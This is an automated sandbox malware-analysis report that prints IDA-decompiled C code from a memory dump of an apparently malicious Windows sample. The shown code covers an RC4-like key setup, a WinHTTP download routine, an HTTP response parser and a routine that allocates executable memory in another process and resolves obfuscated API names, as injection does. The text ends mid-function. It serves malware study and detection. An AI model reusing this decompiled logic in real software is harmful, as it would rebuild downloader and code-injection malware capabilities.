    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    C-Code - Quality: 86%
    			E003DE97F() {
    				char _v404;
    				long _v408;
    				char _t11;
    				signed int _t12;
    				_Unknown_base(*)()* _t20;
    				signed int _t25;
    				signed char _t28;
    				struct HINSTANCE__* _t31;
    				signed int _t39;
    				void* _t41;
    
    				_t41 = (_t39 & 0xfffffff8) - 0x194;
    				_v408 = GetTickCount();
    				_t11 = 0;
    				do {
    					 *((char*)(_t11 + 0x3e89b0)) = _t11;
    					_t11 = _t11 + 1;
    				} while (_t11 != 0x100);
    				_t25 = 0;
    				_t12 = 0;
    				do {
    					_t3 = _t12 + 0x3e89b0; // 0x0
    					_t28 =  *_t3;
    					_t25 = _t25 + ( *(_t41 + (_t12 & 0x00000003) + 0xc) & 0x000000ff) + (_t28 & 0x000000ff) & 0x000000ff;
    					_t6 = _t25 + 0x3e89b0; // 0x0
    					 *((char*)(_t12 + 0x3e89b0)) =  *_t6;
    					_t12 = _t12 + 1;
    					 *(_t25 + 0x3e89b0) = _t28;
    				} while (_t12 != 0x100);
    				 *0x3e89a0 =  *0x3e89a0 & 0x00000000;
    				 *0x3e89a4 =  *0x3e89a4 & 0x00000000;
    				__imp__#115(0x202,  &_v404);
    				_t31 = LoadLibraryA("Advapi32.dll");
    				 *0x3e89a8 = GetProcAddress(_t31, "MD5Init");
    				 *0x3e89ac = GetProcAddress(_t31, "MD5Update");
    				 *0x3e8ab8 = GetProcAddress(_t31, "MD5Final");
    				 *0x3e8ab4 = GetProcAddress(_t31, "A_SHAInit");
    				 *0x3e899c = GetProcAddress(_t31, "A_SHAUpdate");
    				_t20 = GetProcAddress(_t31, "A_SHAFinal");
    				 *0x3e8ab0 = _t20;
    				return _t20;
    			}

    APIs
    • GetTickCount.KERNEL32(0000000E,00000001,003D03C4), ref: 003DE98E
    • WSAStartup.WS2_32(00000202,?), ref: 003DE9FA
    • LoadLibraryA.KERNEL32(Advapi32.dll), ref: 003DEA05
    • GetProcAddress.KERNEL32(00000000,MD5Init), ref: 003DEA19
    • GetProcAddress.KERNEL32(00000000,MD5Update), ref: 003DEA26
    • GetProcAddress.KERNEL32(00000000,MD5Final), ref: 003DEA33
    • GetProcAddress.KERNEL32(00000000,A_SHAInit), ref: 003DEA40
    • GetProcAddress.KERNEL32(00000000,A_SHAUpdate), ref: 003DEA4D
    • GetProcAddress.KERNEL32(00000000,A_SHAFinal), ref: 003DEA5A
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    C-Code - Quality: 44%
    			E003C71D0(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, signed int _a12) {
    				void* _v8;
    				char _v12;
    				intOrPtr _v16;
    				intOrPtr _v20;
    				char _v24;
    				int _v28;
    				int _v32;
    				char _v36;
    				int _v40;
    				char _v44;
    				char _v72;
    				signed int _v84;
    				intOrPtr _v88;
    				signed int _v112;
    				intOrPtr _v116;
    				intOrPtr _v120;
    				signed int _v124;
    				void _v132;
    				char _v852;
    				signed int _t82;
    				signed int _t83;
    				intOrPtr _t89;
    				intOrPtr _t90;
    				void* _t99;
    				void* _t101;
    				void* _t103;
    				void* _t105;
    				void* _t109;
    				intOrPtr _t110;
    				intOrPtr _t113;
    				signed int _t115;
    				intOrPtr _t117;
    				char* _t118;
    				intOrPtr _t120;
    				intOrPtr _t121;
    				intOrPtr _t123;
    				char* _t161;
    				signed int _t163;
    				intOrPtr _t164;
    				intOrPtr _t166;
    				void* _t168;
    				void* _t169;
    				void* _t171;
    
    				_v40 = 0;
    				_v28 = 0;
    				_t161 = 0;
    				_v8 = 0;
    				_t166 = 0;
    				_v44 = 0;
    				_v24 = 0;
    				_v12 = 0;
    				_v32 = 0;
    				_t82 = memset( &_v132, 0, 0x3c);
    				_t169 = _t168 + 0xc;
    				_t83 = _t82 | 0xffffffff;
    				_v132 = 0x3c;
    				_v124 = _t83;
    				_v112 = _t83;
    				_v84 = _t83;
    				__imp__WinHttpCrackUrl(_a4, 0, 0,  &_v132, __edi, __esi, __ebx);
    				if(_t83 == 0) {
    					L46:
    					_t84 = _v12;
    					if(_v12 != 0) {
    						E003CBB40(_t84);
    					}
    					return _v32;
    				}
    				_t87 = _v112;
    				if(_v112 != 0 || _v84 != 0) {
    					_t89 = E003D1D90(_t87 + _t87 + 2, 0);
    					_t169 = _t169 + 8;
    					_v16 = _t89;
    					if(_t89 == 0) {
    						goto L46;
    					}
    					_t90 = E003D1D90(_v84 + _v84 + 2, 0);
    					_t171 = _t169 + 8;
    					_v20 = _t90;
    					_t176 = _t90;
    					if(_t90 == 0) {
    						L44:
    						E003CBB40(_v16);
    						_t92 = _v20;
    						_t169 = _t171 + 4;
    						if(_v20 != 0) {
    							E003CBB40(_t92);
    							_t169 = _t169 + 4;
    						}
    						goto L46;
    					}
    					E003CD620(_v16, _v112 + 1, _v116);
    					E003CD620(_v20, _v84 + 1, _v88);
    					_t99 = E003E1280(_t176, _v16);
    					_t171 = _t171 + 4;
    					_t177 = _t99;
    					if(_t99 != 0) {
    						L003E1DC0( &_v72);
    						_t101 = E003E1B60( &_v72, _v16, 0x50);
    						__eflags = _t101;
    						if(_t101 != 0) {
    							_t103 = E003E1B30(_v20,  &_v24);
    							__eflags = _t103;
    							if(_t103 != 0) {
    								_v36 = 0;
    								_t105 = E003E1C30( &_v72,  &_v12,  &_v36);
    								__eflags = _t105;
    								if(_t105 != 0) {
    									__eflags = _v24 + 0xffffff38 - 0x1a;
    									_t142 =  &_v72;
    									if(_v24 + 0xffffff38 > 0x1a) {
    										L28:
    										E003E1730(_t142);
    										goto L44;
    									}
    									_t166 = _v36;
    									E003E1730( &_v72);
    									L35:
    									_t109 = E003C1A80(_t142, _a8, _v12, _t166);
    									_t171 = _t171 + 0xc;
    									if(_t109 != 0) {
    										_v32 = 1;
    									}
    									L37:
    									if(_t161 != 0) {
    										__imp__WinHttpCloseHandle(_t161);
    									}
    									L39:
    									_t163 = _v28;
    									L40:
    									if(_t163 != 0) {
    										__imp__WinHttpCloseHandle(_t163);
    									}
    									L42:
    									_t110 = _v40;
    									if(_t110 != 0) {
    										__imp__WinHttpCloseHandle(_t110);
    									}
    									goto L44;
    								}
    								E003E1730( &_v72);
    								goto L44;
    							}
    							E003E1730( &_v72);
    							goto L44;
    						}
    						_t142 =  &_v72;
    						goto L28;
    					}
    					_t113 = E003C9090(_t177,  &_v852, 0x49);
    					_t171 = _t171 + 8;
    					__imp__WinHttpOpen( &_v852, 0, 0, 0, 0);
    					_t164 = _t113;
    					_v40 = _t164;
    					if(_t164 == 0) {
    						goto L44;
    					}
    					_t115 = _a12 * 0xea60;
    					__imp__WinHttpSetTimeouts(_t164, 0x15f90, 0x15f90, 0x2bf20, _t115);
    					__imp__WinHttpConnect(_t164, _v16, 0, 0);
    					_t163 = _t115;
    					_v28 = _t163;
    					_t179 = _t163;
    					if(_t163 == 0) {
    						goto L42;
    					}
    					E003C9090(_t179,  &_v852, 0x69);
    					_t117 = _v120;
    					_t171 = _t171 + 8;
    					if(_t117 != 1) {
    						__eflags = _t117 - 2;
    						if(_t117 != 2) {
    							goto L40;
    						} else {
    							_push(0x800000);
    							_push(0);
    							_push(0);
    							_push(0);
    							_push(_v20);
    							_t118 =  &_v852;
    							_push(_t118);
    							goto L12;
    						}
    					} else {
    						_t118 = _v20;
    						_push(0);
    						_push(0);
    						_push(0);
    						_push(0);
    						_push(_t118);
    						_push( &_v852);
    						L12:
    						__imp__WinHttpOpenRequest(_t163);
    						_t161 = _t118;
    						if(_t161 == 0) {
    							goto L39;
    						}
    						__imp__WinHttpSendRequest(_t161, 0, 0, 0, 0, 0, 0);
    						if(_t118 == 0) {
    							goto L37;
    						}
    						__imp__WinHttpReceiveResponse(_t161, 0);
    						if(_t118 == 0) {
    							goto L37;
    						}
    						_v8 = 4;
    						__imp__WinHttpQueryHeaders(_t161, 0x20000013, 0,  &_v24,  &_v8, 0);
    						if(_t118 == 0) {
    							goto L37;
    						}
    						_t120 = _v24 + 0xffffff38;
    						if(_t120 <= 0x1a) {
    							while(1) {
    								_t142 =  &_v8;
    								_v8 = 0;
    								__imp__WinHttpQueryDataAvailable(_t161,  &_v8);
    								if(_t120 == 0) {
    									goto L37;
    								}
    								_t121 = _v8;
    								if(_t121 == 0) {
    									goto L35;
    								}
    								_t166 = _t166 + _t121;
    								_t122 = _v12;
    								if(_v12 == 0) {
    									_t120 = E003D1D90(_t166, 0);
    									_t171 = _t171 + 8;
    									_v12 = _t120;
    								} else {
    									_t123 = E003D1D90(_t166, _t122);
    									_v12 = _t123;
    									_t171 = _t171 + 8;
    									_t120 = _t123 - _v8 + _t166;
    								}
    								_t142 = _v8;
    								__imp__WinHttpReadData(_t161, _t120, _v8,  &_v44);
    								if(_t120 == 0) {
    									goto L37;
    								} else {
    									if(_v8 > 0) {
    										continue;
    									} else {
    										goto L35;
    									}
    								}
    							}
    						}
    						goto L37;
    					}
    				} else {
    					goto L46;
    				}
    			}

    APIs
    • memset.MSVCRT ref: 003C71FE
    • WinHttpCrackUrl.WINHTTP(?,00000000,00000000,?,?,003C43BC,?), ref: 003C7223
      • Part of subcall function 003D1D90: LoadLibraryA.KERNEL32(?), ref: 003D1DB7
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1DD8
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1DFE
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1E1C
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1E3A
      • Part of subcall function 003D1D90: GetProcessHeap.KERNEL32 ref: 003D1E45
      • Part of subcall function 003D1D90: RtlReAllocateHeap.NTDLL(00160000,00000008,?,003D042E), ref: 003D1E5F
      • Part of subcall function 003D1D90: RtlAllocateHeap.NTDLL(00160000,00000008,003D042E), ref: 003D1E72
    • WinHttpOpen.WINHTTP(?,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,003C43BC,?), ref: 003C72CA
    • WinHttpSetTimeouts.WINHTTP(00000000,00015F90,00015F90,0002BF20,003CD19E,?,?,?,?,?,?,?,?,003C43BC,?), ref: 003C72F7
    • WinHttpConnect.WINHTTP(00000000,?,00000000,00000000,?,?,?,?,?,?,?,?,003C43BC,?), ref: 003C7304
    • WinHttpOpenRequest.WINHTTP(00000000,?,003CD19E,00000000,00000000,00000000,00800000,?,?,?,?,?), ref: 003C735E
    • WinHttpSendRequest.WINHTTP(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?), ref: 003C7375
    • WinHttpReceiveResponse.WINHTTP(00000000,00000000,?,?,?,?,?,?,?,?,?,?,003C43BC,?), ref: 003C7385
    • WinHttpQueryHeaders.WINHTTP(00000000,20000013,00000000,?,0000000C,00000000,?,?,?,?,?), ref: 003C73AA
    • WinHttpQueryDataAvailable.WINHTTP(00000000,00000004,?,?,?,?,?,?,?,?,?,?,003C43BC,?), ref: 003C73D8
    • WinHttpReadData.WINHTTP(00000000,00000000,00000004,?,?,?,?,?,?,?,?), ref: 003C7425
      • Part of subcall function 003E1C30: memcpy.MSVCRT ref: 003E1C65
    • WinHttpCloseHandle.WINHTTP(00000000,?,?,00000050,?,?,?,?,?,?,003C43BC,?), ref: 003C74D7
    • WinHttpCloseHandle.WINHTTP(?,?,?,00000050,?,?,?,?,?,?,003C43BC,?), ref: 003C74E5
    • WinHttpCloseHandle.WINHTTP(?,?,?,00000050,?,?,?,?,?,?,003C43BC,?), ref: 003C74F3
      • Part of subcall function 003CBB40: HeapFree.KERNEL32(00160000,00000008,003D04E6), ref: 003CBB53
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    C-Code - Quality: 100%
    			E003E1820(void* __ebx, intOrPtr* __ecx, void* _a4, char _a8, char _a10, char _a11, int _a12, char _a16, intOrPtr* _a20) {
    				void* _v8;
    				intOrPtr _v12;
    				char _v16;
    				char _v24;
    				char _v32;
    				char _v44;
    				char _v68;
    				char _v196;
    				intOrPtr _t81;
    				void* _t82;
    				void* _t83;
    				void* _t85;
    				void* _t88;
    				char* _t101;
    				int _t105;
    				void* _t110;
    				char* _t112;
    				void* _t114;
    				void* _t118;
    				void* _t121;
    				void* _t124;
    				char _t131;
    				void* _t132;
    				char* _t134;
    				void* _t136;
    				intOrPtr _t140;
    				intOrPtr _t143;
    				intOrPtr _t144;
    				char* _t147;
    				intOrPtr _t149;
    				char _t167;
    				intOrPtr _t172;
    				intOrPtr _t178;
    				void* _t180;
    				void* _t182;
    				intOrPtr* _t183;
    				void* _t184;
    				void* _t185;
    				void* _t187;
    				void* _t188;
    				void* _t189;
    
    				_t183 = __ecx;
    				_v12 = 0;
    				if( *((intOrPtr*)( *((intOrPtr*)( *__ecx + 0x20))))() == 0) {
    					return 0;
    				} else {
    					_t81 =  *0x3e8628; // 0x622508
    					_t180 = _a4;
    					_t82 =  *((intOrPtr*)( *((intOrPtr*)(_t81 + 0xc))))(_t180, __ebx);
    					_t140 =  *0x3e8628; // 0x622508
    					_v8 = _t82;
    					_t83 =  *((intOrPtr*)( *((intOrPtr*)(_t140 + 0xc))))(_a8);
    					_t131 = _a16;
    					if(_t83 + _v8 + _t131 + 0x400 >= 0x400) {
    						_t143 =  *0x3e8628; // 0x622508
    						_t85 =  *((intOrPtr*)( *((intOrPtr*)(_t143 + 0xc))))(_t180);
    						_t144 =  *0x3e8628; // 0x622508
    						_t88 =  *((intOrPtr*)( *((intOrPtr*)(_t144 + 0xc))))(_a8) + _t131 + _t85 + 0x400;
    					} else {
    						_t88 = 0x400;
    					}
    					_t132 = E003D1D90(_t88, 0);
    					_v8 = _t132;
    					_t182 = E003D1D90(0x10000, 0);
    					_t185 = _t184 + 0x10;
    					if(_t182 == 0) {
    						L27:
    						__eflags = _t132;
    						if(_t132 != 0) {
    							E003CBB40(_t132);
    							_t185 = _t185 + 4;
    						}
    					} else {
    						_t193 = _t132;
    						if(_t132 != 0) {
    							E003C6CB0( &_v196, 0xd1);
    							E003C6CB0( &_v24, 0xd2);
    							E003C6CB0( &_v16, 0xd3);
    							E003C9090(_t193,  &_v44, 0xd4);
    							E003C6CB0( &_v32, 0xd4);
    							_t167 = _a8;
    							_t187 = _t185 + 0x28;
    							if(_t167 != 0) {
    								_t147 = 0x3e33e8;
    							} else {
    								_t167 =  &_v44;
    								_t147 = 0x3e33eb;
    							}
    							_t27 =  &_v24; // 0x3c7471
    							_t101 = _t27;
    							if(_a12 == 0) {
    								_t101 =  &_v16;
    							}
    							wsprintfA(_t132,  &_v196, _t101, _a4,  *((intOrPtr*)(_t183 + 8)), _t147, _t167);
    							E003C6CB0( &_v68, 0xd5);
    							_t105 = _a12;
    							_t188 = _t187 + 0x24;
    							if(_t105 != 0) {
    								_t34 =  &_a16; // 0x3c7471
    								_t178 =  *0x3e8628; // 0x622508
    								memcpy( *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x10c))))( *_t34) + _t132, _t132, _t105);
    								_t188 = _t188 + 0xc;
    							}
    							while(1) {
    								L14:
    								_t149 =  *0x3e8628; // 0x622508
    								_v12 = E003D6487( *((intOrPtr*)(_t183 + 4)), _t132,  *((intOrPtr*)( *((intOrPtr*)(_t149 + 0x10c))))(_t132));
    								memset(_t182, 0, 0x10000);
    								_t189 = _t188 + 0x18;
    								 *(_t183 + 0x14) = 0;
    								while(1) {
    									L15:
    									_t110 = E003D64AC( *((intOrPtr*)(_t183 + 4)), _t182 +  *(_t183 + 0x14), 1);
    									_t185 = _t189 + 0xc;
    									if(_t110 == 0) {
    										goto L27;
    									}
    									_t112 = strstr(_t182,  &_v32);
    									_t188 = _t185 + 8;
    									if(_t112 != 0) {
    										L19:
    										 *(_t183 + 0x18) =  *(_t183 + 0x14);
    										_t172 =  *0x3e8628; // 0x622508
    										_t114 =  *((intOrPtr*)( *((intOrPtr*)(_t172 + 0x10c))))(_t182);
    										__eflags = _t114 - 0xc;
    										if(_t114 <= 0xc) {
    											L14:
    											_t149 =  *0x3e8628; // 0x622508
    											_v12 = E003D6487( *((intOrPtr*)(_t183 + 4)), _t132,  *((intOrPtr*)( *((intOrPtr*)(_t149 + 0x10c))))(_t132));
    											memset(_t182, 0, 0x10000);
    											_t189 = _t188 + 0x18;
    											 *(_t183 + 0x14) = 0;
    											continue;
    										} else {
    											L20:
    											_a8 =  *((intOrPtr*)(_t182 + 9));
    											_a10 =  *((intOrPtr*)(_t182 + 0xb));
    											_a11 = 0;
    											 *_a20 = atoi( &_a8);
    											_t134 = strstr(_t182,  &_v68);
    											_t185 = _t188 + 0xc;
    											__eflags = _t134;
    											if(_t134 == 0) {
    												L26:
    												_t132 = _v8;
    											} else {
    												_t118 = strstr(_t134, 0x3e33e8);
    												_t188 = _t185 + 8;
    												_a4 = _t118;
    												__eflags = _t118;
    												if(_t118 == 0) {
    													L13:
    													_t132 = _v8;
    													do {
    														goto L14;
    													} while (_t114 <= 0xc);
    													goto L20;
    												} else {
    													 *_t118 = 0;
    													_t136 = atoi( &(_t134[0x10]));
    													_t188 = _t188 + 4;
    													 *_a4 = 0xd;
    													__eflags = _t136;
    													if(_t136 == 0) {
    														goto L13;
    													} else {
    														_t121 = E003D1D90( *(_t183 + 0x14) + _t136 + 2, 0);
    														_t185 = _t188 + 8;
    														 *(_t183 + 0x10) = _t121;
    														__eflags = _t121;
    														if(_t121 != 0) {
    															memcpy(_t121, _t182,  *(_t183 + 0x14) + 1);
    															_t124 = E003D64AC( *((intOrPtr*)(_t183 + 4)),  *(_t183 + 0x10) +  *(_t183 + 0x14) + 1, _t136);
    															_t185 = _t185 + 0x18;
    															__eflags = _t124;
    															if(_t124 != 0) {
    																_t71 = _t183 + 0x14;
    																 *_t71 =  *(_t183 + 0x14) + _t136 + 1;
    																__eflags =  *_t71;
    																 *((char*)( *(_t183 + 0x10) +  *(_t183 + 0x14))) = 0;
    																_v12 = 1;
    															}
    														}
    														goto L26;
    													}
    												}
    											}
    										}
    									} else {
    										 *(_t183 + 0x14) =  *(_t183 + 0x14) + 1;
    										if( *(_t183 + 0x14) < 0x10000) {
    											continue;
    										} else {
    											while(1) {
    												L14:
    												_t149 =  *0x3e8628; // 0x622508
    												_v12 = E003D6487( *((intOrPtr*)(_t183 + 4)), _t132,  *((intOrPtr*)( *((intOrPtr*)(_t149 + 0x10c))))(_t132));
    												memset(_t182, 0, 0x10000);
    												_t189 = _t188 + 0x18;
    												 *(_t183 + 0x14) = 0;
    												goto L15;
    											}
    										}
    										goto L29;
    									}
    									goto L27;
    								}
    								goto L27;
    							}
    						}
    					}
    					L29:
    					__eflags = _t182;
    					if(_t182 != 0) {
    						E003CBB40(_t182);
    					}
    					return _v12;
    				}
    			}

    APIs
      • Part of subcall function 003D1D90: LoadLibraryA.KERNEL32(?), ref: 003D1DB7
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1DD8
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1DFE
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1E1C
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1E3A
      • Part of subcall function 003D1D90: GetProcessHeap.KERNEL32 ref: 003D1E45
      • Part of subcall function 003D1D90: RtlReAllocateHeap.NTDLL(00160000,00000008,?,003D042E), ref: 003D1E5F
      • Part of subcall function 003D1D90: RtlAllocateHeap.NTDLL(00160000,00000008,003D042E), ref: 003D1E72
    • wsprintfA.USER32 ref: 003E194C
    • memcpy.MSVCRT ref: 003E1981
    • memset.MSVCRT ref: 003E19C8
    • strstr.MSVCRT ref: 003E19F8
    • atoi.MSVCRT ref: 003E1A47
    • strstr.MSVCRT ref: 003E1A57
    • strstr.MSVCRT ref: 003E1A70
    • atoi.MSVCRT ref: 003E1A8B
    • memcpy.MSVCRT ref: 003E1AC4
      • Part of subcall function 003CBB40: HeapFree.KERNEL32(00160000,00000008,003D04E6), ref: 003CBB53
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    C-Code - Quality: 91%
    			E003CDFB0(void* __ecx, struct HINSTANCE__* _a4, _Unknown_base(*)()* _a8) {
    				int _v8;
    				intOrPtr _v12;
    				short _v14;
    				int _v18;
    				char _v20;
    				intOrPtr _v52;
    				intOrPtr _v88;
    				intOrPtr _v92;
    				_Unknown_base(*)()* _v96;
    				_Unknown_base(*)()* _v100;
    				_Unknown_base(*)()* _v104;
    				_Unknown_base(*)()* _v108;
    				_Unknown_base(*)()* _v112;
    				_Unknown_base(*)()* _v116;
    				_Unknown_base(*)()* _v120;
    				_Unknown_base(*)()* _v124;
    				char _v128;
    				_Unknown_base(*)()* _v132;
    				void _v136;
    				char _v236;
    				char _v436;
    				intOrPtr _t133;
    				intOrPtr _t134;
    				intOrPtr _t135;
    				_Unknown_base(*)()* _t137;
    				intOrPtr _t138;
    				_Unknown_base(*)()* _t141;
    				_Unknown_base(*)()* _t148;
    				intOrPtr _t150;
    				intOrPtr _t152;
    				_Unknown_base(*)()* _t153;
    				intOrPtr _t156;
    				intOrPtr _t160;
    				intOrPtr _t164;
    				intOrPtr _t168;
    				_Unknown_base(*)()* _t171;
    				intOrPtr _t172;
    				_Unknown_base(*)()* _t175;
    				_Unknown_base(*)()* _t176;
    				_Unknown_base(*)()* _t207;
    				_Unknown_base(*)()* _t208;
    				_Unknown_base(*)()* _t209;
    				_Unknown_base(*)()* _t211;
    				_Unknown_base(*)()* _t217;
    				_Unknown_base(*)()* _t218;
    				_Unknown_base(*)()* _t222;
    				_Unknown_base(*)()* _t224;
    				intOrPtr _t226;
    				intOrPtr _t262;
    				intOrPtr _t263;
    				intOrPtr _t264;
    				intOrPtr _t265;
    				intOrPtr _t272;
    				intOrPtr _t276;
    				intOrPtr _t277;
    				intOrPtr _t278;
    				intOrPtr _t291;
    				void* _t306;
    				struct HINSTANCE__* _t307;
    				void* _t310;
    
    				_t222 = 0;
    				_t310 = __ecx;
    				_v8 = 0;
    				if( *((intOrPtr*)(__ecx + 0x6c)) == 0) {
    					memset( &_v136, 0, 0x70);
    					_t226 =  *0x3e8628; // 0x622508
    					_t133 =  *((intOrPtr*)( *((intOrPtr*)(_t226 + 0x88))))(0, 0, 0, 0, _t306);
    					 *((intOrPtr*)(_t310 + 0x80)) = _t133;
    					_t134 =  *0x3e8628; // 0x622508
    					_t135 =  *((intOrPtr*)( *((intOrPtr*)(_t134 + 0x88))))(0, 0, 0, 0);
    					 *((intOrPtr*)(_t310 + 0x84)) = _t135;
    					_t272 =  *0x3e8628; // 0x622508
    					_t137 =  *((intOrPtr*)( *((intOrPtr*)(_t272 + 0x88))))(0, 1, 1, 0);
    					_t307 = _a4;
    					 *((intOrPtr*)(_t310 + 0x60)) = _a8;
    					 *(_t310 + 0x88) = _t137;
    					 *((intOrPtr*)(_t310 + 0x5c)) = _t307;
    					_t138 =  *0x3e8628; // 0x622508
    					_t14 = _t138 + 0x8c; // 0x622594
    					_a4 = _t14;
    					_t18 = _t310 + 0x80; // 0x828b003e
    					_t141 =  *(_a4->i)( *((intOrPtr*)( *((intOrPtr*)(_t138 + 0x100))))( *_t18, _t307,  &_v136, 0, 0, 2));
    					__eflags = _t141;
    					if(_t141 == 0) {
    						L21:
    						_t98 = _t310 + 0x80; // 0x828b003e
    						_t276 =  *0x3e8628; // 0x622508
    						 *((intOrPtr*)( *((intOrPtr*)(_t276 + 0xf8))))( *_t98);
    						_t100 = _t310 + 0x84; // 0xc8
    						_t277 =  *0x3e8628; // 0x622508
    						 *((intOrPtr*)( *((intOrPtr*)(_t277 + 0xf8))))( *_t100);
    						_t102 = _t310 + 0x88; // 0x3e868
    						_t278 =  *0x3e8628; // 0x622508
    						 *((intOrPtr*)( *((intOrPtr*)(_t278 + 0xf8))))( *_t102);
    						__eflags = _v136;
    						if(_v136 != 0) {
    							_t164 =  *0x3e8628; // 0x622508
    							_t106 = _t164 + 0x8c; // 0x622594
    							_a4 = _t106;
    							 *(_a4->i)(_t307, _v136,  *((intOrPtr*)( *((intOrPtr*)(_t164 + 0x100))))(0, 0, 0, 3));
    						}
    						__eflags = _v132;
    						if(_v132 != 0) {
    							_t160 =  *0x3e8628; // 0x622508
    							_t112 = _t160 + 0x8c; // 0x622594
    							_a4 = _t112;
    							 *(_a4->i)(_t307, _v132,  *((intOrPtr*)( *((intOrPtr*)(_t160 + 0x100))))(0, 0, 0, 3));
    						}
    						__eflags =  *(_t310 + 0x88);
    						if( *(_t310 + 0x88) != 0) {
    							_t156 =  *0x3e8628; // 0x622508
    							_t118 = _t156 + 0x8c; // 0x622594
    							_a4 = _t118;
    							 *(_a4->i)(_t307, _v128,  *((intOrPtr*)( *((intOrPtr*)(_t156 + 0x100))))(0, 0, 0, 3));
    						}
    						__eflags = _t222;
    						if(_t222 != 0) {
    							_t152 =  *0x3e8628; // 0x622508
    							_t153 = _t152 + 0x6c;
    							__eflags = _t153;
    							_a8 = _t153;
    							 *( *_a8)(_t307, _t222, E003CEA80(), 0x8000);
    						}
    						_t148 = _v8;
    						__eflags = _t148;
    						if(_t148 != 0) {
    							_t150 =  *0x3e8628; // 0x622508
    							 *((intOrPtr*)( *((intOrPtr*)(_t150 + 0x6c))))(_t307, _t148, 0x70, 0x8000);
    						}
    						__eflags = 0;
    						 *(_t310 + 0x8c) = 0;
    						 *(_t310 + 0x90) = 0;
    						 *((intOrPtr*)(_t310 + 0x80)) = 0;
    						 *((intOrPtr*)(_t310 + 0x84)) = 0;
    						 *(_t310 + 0x88) = 0;
    						return 0;
    					} else {
    						_t168 =  *0x3e8628; // 0x622508
    						_t20 = _t168 + 0x8c; // 0x622594
    						_a4 = _t20;
    						_t24 = _t310 + 0x84; // 0xc8
    						_t171 =  *(_a4->i)( *((intOrPtr*)( *((intOrPtr*)(_t168 + 0x100))))( *_t24, _t307,  &_v132, 0, 0, 2));
    						__eflags = _t171;
    						if(_t171 == 0) {
    							goto L21;
    						} else {
    							_t172 =  *0x3e8628; // 0x622508
    							_t26 = _t172 + 0x8c; // 0x622594
    							_a4 = _t26;
    							_t30 = _t310 + 0x88; // 0x3e868
    							_t175 =  *(_a4->i)( *((intOrPtr*)( *((intOrPtr*)(_t172 + 0x100))))( *_t30, _t307,  &_v128, 0, 0, 2));
    							__eflags = _t175;
    							if(_t175 == 0) {
    								goto L21;
    							} else {
    								_push(0x40);
    								_push(0x3000);
    								_t176 = E003CEA80();
    								_push(_t176);
    								_push(0);
    								_push(_t307);
    								E003D1E80();
    								_t222 = _t176;
    								__eflags = _t222;
    								if(_t222 == 0) {
    									goto L21;
    								} else {
    									__eflags = E003C7B30(_t310, _t307, _t222, E003CE8B0, E003CEA80());
    									if(__eflags == 0) {
    										goto L21;
    									} else {
    										_v92 = 0;
    										_v88 = 0;
    										_v52 = 0;
    										E003C9090(__eflags,  &_v436, 0x6c);
    										_t291 =  *0x3e8628; // 0x622508
    										_a4 =  *((intOrPtr*)( *((intOrPtr*)(_t291 + 0x24))))( &_v436);
    										E003C6CB0( &_v236, 0x90);
    										_v124 = GetProcAddress(_a4,  &_v236);
    										E003C6CB0( &_v236, 0x91);
    										_v120 = GetProcAddress(_a4,  &_v236);
    										E003C6CB0( &_v236, 0x92);
    										_v116 = GetProcAddress(_a4,  &_v236);
    										E003C6CB0( &_v236, 0x93);
    										_v112 = GetProcAddress(_a4,  &_v236);
    										E003C6CB0( &_v236, 0x94);
    										_v108 = GetProcAddress(_a4,  &_v236);
    										E003C6CB0( &_v236, 0xbf);
    										_v96 = GetProcAddress(_a4,  &_v236);
    										E003C6CB0( &_v236, 0xc0);
    										_v104 = GetProcAddress(_a4,  &_v236);
    										E003C6CB0( &_v236, 0xc1);
    										_t207 = GetProcAddress(_a4,  &_v236);
    										__eflags = _v124;
    										_v100 = _t207;
    										if(_v124 == 0) {
    											goto L21;
    										} else {
    											__eflags = _v120;
    											if(_v120 == 0) {
    												goto L21;
    											} else {
    												__eflags = _v116;
    												if(_v116 == 0) {
    													goto L21;
    												} else {
    													__eflags = _v112;
    													if(_v112 == 0) {
